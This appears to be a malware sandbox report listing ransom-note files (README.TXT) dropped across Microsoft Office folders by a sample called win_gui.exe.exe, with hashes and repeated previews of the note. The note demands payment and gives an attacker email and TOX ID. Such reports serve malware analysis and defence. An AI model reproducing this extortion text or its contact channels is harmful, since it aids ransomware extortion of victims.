                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\assets\fonts\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\office-online-strings\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\office-online-strings\en-US\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000069\assets\assets\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000070\assets\src\assets\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000070\assets\src\assets\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000084\fluidhost\static\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000084\fluidhost\static\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000084\fluidhost\static\media\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000099\assets\CatchUpAssets\icons\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000109\dist\assets\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000118\assets\assets\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000119\_office_iss_excel_shared_ux\UserActivityUX\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
